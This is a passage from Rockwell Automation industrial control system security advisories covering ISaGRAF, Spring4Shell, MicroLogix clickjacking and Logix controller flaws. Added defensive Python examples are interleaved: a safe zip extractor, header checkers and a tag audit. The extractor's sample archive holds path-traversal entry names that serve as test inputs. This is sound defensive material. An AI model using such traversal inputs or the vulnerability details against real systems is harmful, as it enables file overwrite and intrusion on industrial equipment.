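    if unified.startswith("/"):
        return None
    parts: list[str] = []
    for part in unified.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not parts:
                return None  # would step outside the extraction root
            parts.pop()
            continue
        parts.append(part)
    return parts or None


def is_safe_member(name: str) -> bool:
    return normalize_member(name) is not None


def safe_extract(archive: zipfile.ZipFile, dest: Path) -> tuple[list[str], list[str]]:
    """Extract only entries that stay inside dest; return (extracted, rejected)."""
    dest = dest.resolve()
    extracted: list[str] = []
    rejected: list[str] = []
    for info in archive.infolist():
        parts = normalize_member(info.filename)
        if parts is None:
            rejected.append(info.filename)
            continue
        target = dest.joinpath(*parts).resolve()
        # Re-check after joining: a symlink already inside dest could point elsewhere.
        if target != dest and dest not in target.parents:
            rejected.append(info.filename)
            continue
        if info.is_dir():
            target.mkdir(parents=True, exist_ok=True)
        else:
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(archive.read(info))
        extracted.append(info.filename)
    return extracted, rejected


def build_sample_archive() -> bytes:
    """Constructed stand-in for an exchange file: one benign entry, three escapes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("project/main.st", "PROGRAM main\nEND_PROGRAM\n")
        zf.writestr("../../outside.txt", "escape via ..")
        zf.writestr("project\\..\\..\\..\\outside.txt", "escape via backslashes")
        zf.writestr("C:\\Windows\\outside.txt", "absolute Windows path")
    return buf.getvalue()


def demo() -> tuple[list[str], list[str]]:
    """Extract the sample archive into a throwaway directory and report the outcome."""
    with tempfile.TemporaryDirectory() as tmp:
        with zipfile.ZipFile(io.BytesIO(build_sample_archive())) as zf:
            return safe_extract(zf, Path(tmp))


if __name__ == "__main__":
    ok, bad = demo()
    print("extracted:", ok)
    print("rejected: ", bad)
```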

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability / Product / Suggested Actions
  • CVE-2022-2463, CVE-2022-2464, CVE-2022-2465 – ISaGRAF Workbench: Upgrade to ISaGRAF Workbench v6.6.10 or later.
  • CVE-2022-2463, CVE-2022-2464 – AADvance-Trusted SIS Workstation: Upgrade to AADvance-Trusted SIS Workstation 1.2 or later.
  • CVE-2022-2465 – AADvance-Trusted SIS Workstation: It is recommended that customers follow the security guidelines below until an updated release is available to mitigate this issue.
If immediate upgrade is not possible, customers should consider implementing the following mitigations:
  • Run ISaGRAF Workbench as a User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Do not open untrusted .7z exchange files with ISaGRAF Workbench. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  • Use of Microsoft® AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

If applying the mitigations noted above is not possible, please see our Knowledgebase article, QA43240 – Security Best Practices, for additional recommendations to maintain the security posture of your environment.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

  • PN1354 – Industrial Security Advisory Index
  • https://nvd.nist.gov/vuln/detail/CVE-2022-2463
  • https://nvd.nist.gov/vuln/detail/CVE-2022-2464
  • https://nvd.nist.gov/vuln/detail/CVE-2022-2465

Critical
PN1599 | FactoryTalk Analytics DataView Vulnerable to Spring4Shell Vulnerability (CVE-2022-22965)
Published Date:
July 14, 2022
Last Updated:
July 14, 2022
Products:
FactoryTalk Analytics DataView
CVSS Scores:
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 – July 14, 2022

Executive Summary

Rockwell Automation was made aware of a zero-day vulnerability that impacts the Spring Core Framework. If exploited, this vulnerability could potentially have a high impact on the confidentiality, integrity, and availability of the targeted device.

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them where appropriate. Additional details relating to the discovered vulnerability, including products in scope, impact, and recommended countermeasures are provided. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

  • FactoryTalk® Analytics™ DataView v.3.03.01 and below

Vulnerability Details

Rockwell Automation was made aware of a third-party remote code execution vulnerability that exists in the Spring Core Framework. This vulnerability could potentially allow an attacker to send a specially crafted request to a vulnerable server. To exploit this vulnerability, the target application must run on Tomcat as a WAR deployment. However, due to the nature of the vulnerability, other ways to exploit it may exist.

CVSS Base Score: 9.8/10 (Critical)
CVSS 3.1 Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Risk Mitigation & User Action

Rockwell Automation is in the process of testing and validating the patch and will update this advisory for each product as updated firmware becomes available. Please see our Knowledgebase article, QA43240 - Security Best Practices, for additional recommendations to maintain the security posture of your environment.

References

  • NVD - cve-2022-22965 (nist.gov)

Medium
PN1597 | MicroLogix 1400/1100 Vulnerable to Clickjacking Vulnerability
Published Date:
July 07, 2022
Last Updated:
July 07, 2022
CVE IDs:
CVE-2022-2179
Products:
1763 MicroLogix 1100, 1766 MicroLogix 1400
CVSS Scores:
6.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 – July 7, 2022

Executive Summary

Rockwell Automation received a vulnerability report from Pawan V. Sable, Pranita Sadgir, and Dr. Faruk Kazi of COE-CNDS at Veermata Jijabai Technological Institute (VJTI), India. If exploited, this vulnerability could potentially have a high impact on the confidentiality of the targeted device.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided herein. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

  • MicroLogix™ 1400 v. 21.007 and below
  • MicroLogix™ 1100 all versions

Vulnerability Details

Rockwell Automation was made aware that the X-Frame-Options header is not configured in the HTTP response and allows potential clickjacking attacks. Exploitation of this vulnerability could potentially allow a malicious user to trick a legitimate user into using an untrusted website. If exploited, this vulnerability could lead to a loss of sensitive information, such as authentication credentials.

CVE-2022-2179 MicroLogix Controllers Vulnerable to Clickjacking Attack
CVSS Base Score: 6.5/10 (Medium)
CVSS 3.1 Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
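An added example, not Rockwell Automation code, of the defender-side check the details above imply: inspect a response for the X-Frame-Options header, and for the CSP frame-ancestors directive that supersedes it in current browsers, and report whether the page can be framed. The sample responses are constructed test inputs, not captures from a MicroLogix controller.

```python
"""Check an HTTP response for clickjacking protection.

Added example, not Rockwell Automation code: it looks for the X-Frame-Options
header the advisory says is missing, and for the CSP frame-ancestors directive
that supersedes it. The responses below are constructed, not device captures.
"""
from __future__ import annotations

from dataclasses import dataclass

# X-Frame-Options values current browsers honour; the obsolete ALLOW-FROM is
# ignored by them and so does not count as protection.
_SAFE_XFO = {"deny", "sameorigin"}


@dataclass
class FramingCheck:
    x_frame_options: str | None
    frame_ancestors: list[str] | None
    protected: bool
    reason: str


def parse_response_headers(raw: bytes) -> dict[str, list[str]]:
    """Parse the head of a raw HTTP/1.x response into a lower-cased header map."""
    head, _sep, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers: dict[str, list[str]] = {}
    for line in lines[1:]:  # lines[0] is the status line
        name, sep, value = line.partition(":")
        if not sep:
            continue  # malformed header line, skip it
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def csp_frame_ancestors(csp_values: list[str]) -> list[str] | None:
    """Return the source list of the first frame-ancestors directive, or None."""
    for policy in csp_values:
        for directive in policy.split(";"):
            tokens = directive.split()
            if tokens and tokens[0].lower() == "frame-ancestors":
                return tokens[1:]
    return None


def assess_framing(raw: bytes) -> FramingCheck:
    """Decide whether the response may be embedded in a third-party frame."""
    headers = parse_response_headers(raw)
    xfo_values = headers.get("x-frame-options", [])
    xfo = xfo_values[0] if xfo_values else None
    ancestors = csp_frame_ancestors(headers.get("content-security-policy", []))

    # A frame-ancestors directive, when present, takes precedence over X-Frame-Options.
    if ancestors is not None:
        if "*" in ancestors:
            return FramingCheck(xfo, ancestors, False, "frame-ancestors permits any origin")
        return FramingCheck(xfo, ancestors, True, "frame-ancestors restricts embedding")
    if xfo is None:
        return FramingCheck(None, None, False, "no X-Frame-Options or frame-ancestors")
    if xfo.lower() in _SAFE_XFO:
        return FramingCheck(xfo, None, True, f"X-Frame-Options {xfo.upper()}")
    return FramingCheck(xfo, None, False, f"unsupported X-Frame-Options value {xfo!r}")


# Constructed samples. UNPROTECTED mirrors the advisory: a login page served
# without any framing header, so it can be overlaid by an attacker-controlled page.
UNPROTECTED = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><form action='/login'>...</form></html>"
)
HARDENED_XFO = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"X-Frame-Options: SAMEORIGIN\r\n"
    b"\r\n"
)
HARDENED_CSP = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n"
    b"\r\n"
)
WEAK_CSP = (  # DENY is present, but the CSP wildcard takes precedence
    b"HTTP/1.1 200 OK\r\n"
    b"X-Frame-Options: DENY\r\n"
    b"Content-Security-Policy: frame-ancestors *\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for label, sample in [("unprotected", UNPROTECTED), ("xfo", HARDENED_XFO),
                          ("csp", HARDENED_CSP), ("weak-csp", WEAK_CSP)]:
        result = assess_framing(sample)
        print(f"{label:12} protected={result.protected} ({result.reason})")
```

The same function accepts any captured response bytes, so a saved response from a device's web server can be checked the same way.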

Risk Mitigation & User Action

Customers using the affected software are encouraged to implement the risk mitigations below to minimize the risk of vulnerability. Additionally, we encourage customers to combine the risk mitigations with security best practices, also provided below, to deploy a defense-in-depth strategy.
  • Disable the web server, if possible (This component is an optional feature and disabling it will not disrupt the intended use of the device)
  • Configure firewalls to disallow network communication through HTTP/Port 80
If applying the mitigations noted above is not possible, please see our Knowledgebase article QA43240 - Security Best Practices for additional recommendations to maintain the security posture of your environment.
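An added example (not from this advisory or from Rockwell Automation) of an offline check for the condition this advisory describes: it parses a raw HTTP response and reports whether an X-Frame-Options header, or the Content-Security-Policy frame-ancestors directive that supersedes it, would stop the page from being framed. The sample responses are constructed, not captured from a controller.

```python
"""Offline check for clickjacking (framing) protection in an HTTP response.

Added example, not Rockwell Automation code. The responses below are
constructed samples, not captures from a MicroLogix controller.
"""
from typing import Dict, List

FRAMING_VALUES = {"DENY", "SAMEORIGIN"}  # the only X-Frame-Options values browsers enforce

SAMPLE_RESPONSES = {
    # Missing X-Frame-Options entirely: the condition the advisory describes.
    "no_framing_header": (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html\r\n"
        "Server: constructed-sample\r\n"
        "\r\n"
        "<html><body>Login</body></html>"
    ),
    "xfo_deny": "HTTP/1.1 200 OK\r\nX-Frame-Options: DENY\r\n\r\n",
    "xfo_conflict": "HTTP/1.1 200 OK\r\nX-Frame-Options: DENY\r\nx-frame-options: ALLOWALL\r\n\r\n",
    "csp_none": "HTTP/1.1 200 OK\r\nContent-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n\r\n",
    "csp_wildcard": "HTTP/1.1 200 OK\r\nContent-Security-Policy: frame-ancestors *\r\n\r\n",
    "csp_report_only": "HTTP/1.1 200 OK\r\nContent-Security-Policy-Report-Only: frame-ancestors 'none'\r\n\r\n",
}


def parse_headers(raw_response: str) -> Dict[str, List[str]]:
    """Return response headers as {lowercased-name: [values...]}; the body is ignored."""
    head = raw_response.replace("\r\n", "\n").split("\n\n", 1)[0]
    headers: Dict[str, List[str]] = {}
    for line in head.split("\n")[1:]:  # skip the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def audit_framing(raw_response: str) -> dict:
    """Decide whether the response stops other sites from framing the page.

    Returns {"protected": bool, "controls": [...], "notes": [...]}.
    """
    headers = parse_headers(raw_response)
    result = {"protected": False, "controls": [], "notes": []}

    # CSP frame-ancestors is the modern control and overrides X-Frame-Options
    # when both are present; only the enforcing header (not Report-Only) counts.
    for policy in headers.get("content-security-policy", []):
        for directive in policy.split(";"):
            parts = directive.split()
            if not parts or parts[0].lower() != "frame-ancestors":
                continue
            sources = {s.strip("'").lower() for s in parts[1:]}
            if not sources:
                result["notes"].append("frame-ancestors has no source list; not counted")
            elif "*" in sources:
                result["notes"].append("frame-ancestors * allows framing by any origin")
            else:
                result["protected"] = True
                result["controls"].append("csp-frame-ancestors")
    if headers.get("content-security-policy-report-only"):
        result["notes"].append("report-only CSP does not block framing")

    xfo_values = {v.strip().upper() for v in headers.get("x-frame-options", [])}
    if not xfo_values:
        result["notes"].append("X-Frame-Options header missing")
    elif len(xfo_values) > 1:
        result["notes"].append("conflicting X-Frame-Options values: " + ", ".join(sorted(xfo_values)))
    elif xfo_values <= FRAMING_VALUES:
        result["protected"] = True
        result["controls"].append("x-frame-options")
    else:
        result["notes"].append("unenforced X-Frame-Options value: " + next(iter(xfo_values)))
    return result


def unprotected_samples(samples: Dict[str, str] = None) -> List[str]:
    """Names of the sample responses that would still allow clickjacking."""
    samples = SAMPLE_RESPONSES if samples is None else samples
    return [name for name, raw in samples.items() if not audit_framing(raw)["protected"]]


if __name__ == "__main__":
    for name, raw in SAMPLE_RESPONSES.items():
        verdict = audit_framing(raw)
        print(f"{name:20s} protected={verdict['protected']} {verdict['notes']}")
```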

References

  • CVE-2022-2179

Medium
PN1596 | PN1596 | Logix Controllers Vulnerable to Denial-of-Service Attack
Published Date:
June 17, 2022
Last Updated:
June 17, 2022
CVE IDs:
CVE-2022-1797
Products:
1769 Compact GuardLogix 5370, 1756/5069 GuardLogix, 1768/1769/5069 CompactLogix, 1756 ControlLogix
CVSS Scores:
6.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number: 1.4
Version 1.0 – May 24, 2022
Version 1.1 – June 3, 2022 Updated suggested actions and removed versions for clarity
Version 1.2 – June 17, 2022 Clarified vulnerability details and updated risk mitigation section
Version 1.3 – July 8, 2022 Updated risk mitigation section
Version 1.4 – July 17, 2023 Updated risk mitigation section

Executive Summary

Rockwell Automation was made aware of a vulnerability within our Logix controllers. This vulnerability may allow an unauthorized user to send malicious messages to the targeted device, which could potentially lead to a denial-of-service.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply them to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided in this security advisory.

Affected Products

  • CompactLogix™ 5380 controllers
  • Compact GuardLogix® 5380 controllers
  • CompactLogix 5480 controllers
  • ControlLogix® 5580 controllers
  • GuardLogix 5580 controllers
  • CompactLogix 5370 controllers
  • Compact GuardLogix 5370 controllers
  • ControlLogix 5570 controllers
  • GuardLogix 5570 controllers

Vulnerability Details

CVE-2022-1797 Rockwell Automation Logix controllers are vulnerable to denial-of-service attack
A vulnerability that exists in the Logix controller may allow an attacker to modify a message instruction control structure that could cause a denial-of-service condition due to a major nonrecoverable fault. If the controller experiences a major nonrecoverable fault, a user will have to clear the fault and redownload the user project file to bring the device back online and continue normal operations.

CVSS v3.1 Base Score: 6.8/10[MEDIUM]
CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H

Risk Mitigation & User Action

Customers can apply either mitigation A or B to address this vulnerability. Customers are directed towards the risk mitigation provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Products Affected: CompactLogix 5380, Compact GuardLogix 5380, CompactLogix 5480, ControlLogix 5580, GuardLogix 5580
Version Affected: Versions prior to 32.016
Suggested Actions:
  • Mitigation A: Customers should upgrade to version 32.016 firmware or later to mitigate this issue.
  • Mitigation B: Set the message control structures' access to read-only. Instructions are in Chapter 4 of the Logix 5000™ Controllers I/O and Tag Data Programming Manual, publication 1756-PM004.

Products Affected: CompactLogix 5370, Compact GuardLogix 5370, ControlLogix 5570, GuardLogix 5570
Version Affected: Versions prior to 33.016
Suggested Actions:
  • Mitigation A: Customers should upgrade to version 33.016 firmware or later to mitigate this issue.
  • Mitigation B: Set the message control structures' access to read-only. Instructions are in Chapter 4 of the Logix 5000™ Controllers I/O and Tag Data Programming Manual, publication 1756-PM004.

Products Affected: ControlLogix 5570 Redundancy
Version Affected: Versions prior to 33.053
Suggested Actions:
  • Mitigation A: Customers should upgrade to version 33.053 firmware or later to mitigate this issue.
  • Mitigation B: Set the message control structures' access to read-only. Instructions are in Chapter 4 of the Logix 5000™ Controllers I/O and Tag Data Programming Manual, publication 1756-PM004.


If applying mitigation A or B is not possible, customers should consider implementing the following solutions:
  • Use of Microsoft® AppLocker or other similar allow list applications can help mitigate risk. Information on using AppLocker with products from Rockwell Automation is available at Knowledgebase article QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.
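An added example (not from this advisory or from Rockwell Automation) that supports Mitigation B by auditing a project export rather than clicking through every tag: it scans a Logix 5000 L5X file for MESSAGE-type tags, at controller and program scope, whose External Access still permits writes. The L5X layout, the ExternalAccess attribute values, the default when the attribute is absent, and the sample export are all assumptions; confirm them against publication 1756-PM004 for your controller version.

```python
"""Find MESSAGE (MSG) control-structure tags whose External Access still allows writes.

Added example, not Rockwell Automation code. Assumptions (confirm against
publication 1756-PM004 for your controller version): tags live under
Controller/Tags and Controller/Programs/Program/Tags in an L5X export,
MSG control structures have DataType="MESSAGE", and the ExternalAccess
attribute takes "Read/Write", "Read Only" or "None", defaulting to
Read/Write when absent. The export below is constructed.
"""
import xml.etree.ElementTree as ET
from typing import List, Tuple

SAFE_ACCESS = {"Read Only", "None"}  # neither permits writes from outside the controller

SAMPLE_L5X = """\
<RSLogix5000Content SchemaRevision="1.0" TargetType="Controller">
  <Controller Name="Line1_PLC">
    <Tags>
      <Tag Name="Msg_ReadRemote" TagType="Base" DataType="MESSAGE" ExternalAccess="Read/Write"/>
      <Tag Name="Msg_Locked" TagType="Base" DataType="MESSAGE" ExternalAccess="Read Only"/>
      <Tag Name="Msg_Hidden" TagType="Base" DataType="MESSAGE" ExternalAccess="None"/>
      <Tag Name="Counter" TagType="Base" DataType="DINT" ExternalAccess="Read/Write"/>
    </Tags>
    <Programs>
      <Program Name="MainProgram">
        <Tags>
          <Tag Name="Msg_Local" TagType="Base" DataType="MESSAGE"/>
        </Tags>
      </Program>
    </Programs>
  </Controller>
</RSLogix5000Content>
"""

Finding = Tuple[str, str, str]  # (scope, tag name, external access as exported)


def find_writable_msg_tags(l5x_text: str) -> List[Finding]:
    """Return MESSAGE tags (controller- and program-scoped) that are still writable externally."""
    root = ET.fromstring(l5x_text)
    controller = root.find("Controller")
    if controller is None:
        raise ValueError("no Controller element in L5X content")

    scopes = [("Controller", controller.find("Tags"))]
    for program in controller.iterfind("Programs/Program"):
        scopes.append((program.get("Name", "?"), program.find("Tags")))

    findings: List[Finding] = []
    for scope, tags in scopes:
        if tags is None:
            continue
        for tag in tags.iterfind("Tag"):
            if tag.get("DataType") != "MESSAGE":
                continue
            access = tag.get("ExternalAccess", "Read/Write")  # assumed default when omitted
            if access not in SAFE_ACCESS:
                findings.append((scope, tag.get("Name", "?"), access))
    return findings


def summarize(l5x_text: str) -> dict:
    """Counts for a change ticket: how many MSG tags exist and how many are still writable."""
    root = ET.fromstring(l5x_text)
    total = sum(1 for tag in root.iter("Tag") if tag.get("DataType") == "MESSAGE")
    writable = find_writable_msg_tags(l5x_text)
    return {"message_tags": total, "writable": len(writable), "findings": writable}


if __name__ == "__main__":
    for scope, name, access in find_writable_msg_tags(SAMPLE_L5X):
        print(f"{scope}.{name}: ExternalAccess={access} -> set to Read Only (Mitigation B)")
```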

General Security Guidelines

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, see Knowledgebase article PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as connected devices.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation, and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

  • PN1354 - Industrial Security Advisory Index
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • CVE-2022-1797

Critical
PN1585 | PN1585 | Logix Controllers May Allow for Unauthorized Code Injection
Published Date:
May 06, 2022
Last Updated:
May 06, 2022
CVE IDs:
CVE-2021-22681, CVE-2022-1161
Products:
5069 Compact GuardLogix 5380, 1769 CompactLogix Controllers, 1769 CompactLogix 5370, 1756/5069 GuardLogix, 1768 CompactLogix Controllers, ControlLogix Hardware
CVSS Scores:
10.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.2 – May 06, 2022 Updated vulnerability details and risk mitigations

Detailed Information

Claroty, a cybersecurity technology vendor and partner of Rockwell Automation, disclosed a vulnerability in Logix Controllers to Rockwell Automation. Claroty found that some Logix Controllers may allow an attacker, with the ability to modify user programs, to download a user program containing malicious code that would be undetectable to the user. This vulnerability was found by Sharon Brizinov and Tal Keren of Claroty, and they have provided a blog post with more details located here.

An attacker could gain the ability to modify user programs by leveraging a previously disclosed vulnerability (“Authentication Bypass Vulnerability Found in Logix Controllers”), whereby a discovered private key potentially allows Logix Controllers communicating over the unauthenticated version of EtherNet/IP™ to accept communications that do not originate from Studio 5000 Logix Designer® software.

Affected Products

  • 1768 CompactLogix™ controllers
  • 1769 CompactLogix controllers
  • CompactLogix 5370 controllers
  • CompactLogix 5380 controllers
  • CompactLogix 5480 controllers
  • Compact GuardLogix® 5370 controllers
  • Compact GuardLogix 5380 controllers
  • ControlLogix® 5550 controllers
  • ControlLogix 5560 controllers
  • ControlLogix 5570 controllers
  • ControlLogix 5580 controllers
  • GuardLogix 5560 controllers
  • GuardLogix 5570 controllers
  • GuardLogix 5580 controllers
  • FlexLogix™ 1794-L34 controllers
  • DriveLogix™ 5730 controllers
  • SoftLogix™ 5800 controllers

Vulnerability Details

[CVE-2022-1161]: Modification of PLC Program Code

An attacker with the ability to modify a user program may change user program code on some ControlLogix, CompactLogix, and GuardLogix control systems. Studio 5000 Logix Designer writes user-readable program code to a separate location from the executed compiled code, allowing an attacker to change one and not the other. Additionally, devices communicating over the unauthenticated version of EtherNet/IP may be vulnerable to attacks from custom clients exploiting CVE-2021-22681.

CVSS v3.1 Base Score: 10.0/CRITICAL
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

The following types of code are affected by this vulnerability, indicated by an X (ST = Structured Text, LD = Ladder Diagrams, FBD = Function Block Diagram, SFC = Sequential Function Chart, AOI = Add-On Instructions):

Product                   ST   LD            FBD  SFC  AOI
1768 CompactLogix         X    Not affected  X    X    X
1769 CompactLogix         X    Not affected  X    X    X
CompactLogix 5370         X    Not affected  X    X    X
CompactLogix 5380         X    X             X    X    X
CompactLogix 5480         X    X             X    X    X
Compact GuardLogix 5370   X    Not affected  X    X    X
Compact GuardLogix 5380   X    X             X    X    X
ControlLogix 5550         X    Not affected  X    X    X
ControlLogix 5560         X    Not affected  X    X    X
ControlLogix 5570         X    Not affected  X    X    X
ControlLogix 5580         X    X             X    X    X
GuardLogix 5560           X    Not affected  X    X    X
GuardLogix 5570           X    Not affected  X    X    X
GuardLogix 5580           X    X             X    X    X
FlexLogix 1794-L34        X    Not affected  X    X    X
DriveLogix 5730           X    Not affected  X    X    X
SoftLogix 5800            X    Not affected  X    X    X

Risk Mitigation & User Action

We recommend that customers using the affected products listed below apply both Risk Mitigations A and B, if possible. Additionally, customers are advised to implement Risk Mitigation B as a long-term mitigation action and to increase the overall security posture of their environment. Furthermore, we encourage customers to apply general security guidelines in addition to the risk mitigations for a comprehensive defense in depth strategy.

Product Family:
  • ControlLogix 5570
  • ControlLogix 5580
  • GuardLogix 5570
  • GuardLogix 5580
  • CompactLogix 5380
  • Compact GuardLogix 5380

Risk Mitigation and Recommended User Actions:
Risk Mitigation A:
  • Recompile and download user program code (i.e., the .acd project file) using an uncompromised workstation
  • Put controller mode switch into Run position
If keeping controller mode switch in Run is impractical, use the following mitigation:
  • Recompile and download user program code (i.e., the .acd project file) using an uncompromised workstation
  • Monitor controller change log for any unexpected modifications or anomalous activity
  • Utilize the Controller Log feature
  • Utilize Change Detection in the Logix Designer Application
  • If available, use the functionality in FactoryTalk AssetCentre software to detect changes

Risk Mitigation B:
Implement CIP Security™ to help prevent unauthorized connections when properly deployed. Supported controllers and communications modules include:
  • ControlLogix 5580 processors using on-board EtherNet/IP port
  • GuardLogix 5580 processors using on-board EtherNet/IP port
  • ControlLogix 5580 processors operating in High Availability (HA) configurations using 1756-EN4TR modules
  • ControlLogix 5560, ControlLogix 5570, ControlLogix 5580, GuardLogix 5570 and GuardLogix 5580 can use a 1756-EN4TR ControlLogix EtherNet/IP™ module
  • If using a 1756-EN2T, then replace with a 1756-EN4TR
  • CompactLogix 5380 using on-board EtherNet/IP port
  • Compact GuardLogix 5380 using on-board EtherNet/IP port

We recommend that customers using the affected products listed below apply Risk Mitigation A. We encourage customers to apply general security guidelines in addition to the risk mitigations for a comprehensive defense in depth strategy.

Product Family:
  • 1768 CompactLogix
  • 1769 CompactLogix
  • CompactLogix 5370
  • CompactLogix 5480
  • ControlLogix 5560
  • GuardLogix 5560

Risk Mitigation and Recommended User Actions:
Risk Mitigation A:
  • Recompile and download user program code (i.e., the .acd project file)
  • Put controller mode switch into Run position

If keeping controller mode switch in Run is impractical, then use the following mitigation:
  • Recompile and download user program code (i.e., the .acd project file)
  • Monitor controller change log for any unexpected modifications or anomalous activity
  • Use the Controller Log feature
  • Use Change Detection in the Logix Designer application
  • If available, use the functionality in FactoryTalk AssetCentre to detect changes

In addition to applying risk mitigations, customers should also utilize the detection tools, listed below, to identify if this vulnerability has been exploited in their environment.

Exploitation Detection Method:

The detection method can be used to determine if the user program residing in the controller is identical to what was downloaded. After upgrading to V34, this user program verification can be done via two methods:
  • On-demand using the online feature of the Logix Designer Compare Tool V9 or later. Details on how to utilize user program verification to discover if this vulnerability has been exploited can be found at Logix Designer Compare Tool User Manual, pages 19-20.
  • Schedule user program verification on FactoryTalk® AssetCentre V12 or later (Available Fall 2022).
Notes:
  • The user program comparison must be performed using the online compare tool feature from an uncompromised workstation.
  • Customers are directed to upgrade to Studio 5000® V34 software, or later, and the corresponding firmware versions for the Logix 5580, 5380, 5480, GuardLogix 5580 and Compact GuardLogix 5380. Review your controllers’ user manual to determine the required controller firmware version.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Consult the product documentation for specific features, such as a hardware keyswitch setting, which may be used to block unauthorized changes.
  • Block all traffic to EtherNet/IP or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.

Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Confirm that the least-privilege user principle is followed and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

Social Engineering Mitigation Strategies
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see Rockwell Automation Publication System Security Design Guidelines Reference Manual.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at PN1354 - Industrial Security Advisory Index.

